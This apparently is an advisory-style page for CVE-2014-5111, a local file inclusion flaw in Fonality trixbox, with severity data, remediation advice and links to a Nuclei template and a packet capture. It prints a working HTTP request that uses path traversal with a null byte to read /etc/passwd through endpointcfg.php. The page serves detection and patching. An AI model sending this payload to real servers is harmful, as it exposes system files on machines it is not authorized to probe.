🔙 목록으로 돌아가기

CVE-2014-5111: Fonality trixbox - Local File Inclusion

TitleFonality trixbox - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
RemediationApply the latest patches and updates provided by the vendor to fix the local file inclusion vulnerability in Fonality trixbox.
CVSS Score5
EPSS Score0.66663
CVE IDCVE-2014-5111
CWE IDCWE-22
Tags cve2014 cve packetstorm lfi trixbox edb netfortris xss vuln

🔍 Vulnerability Description

Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.

🌐 HTTP Request

GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-5111.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-5111.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A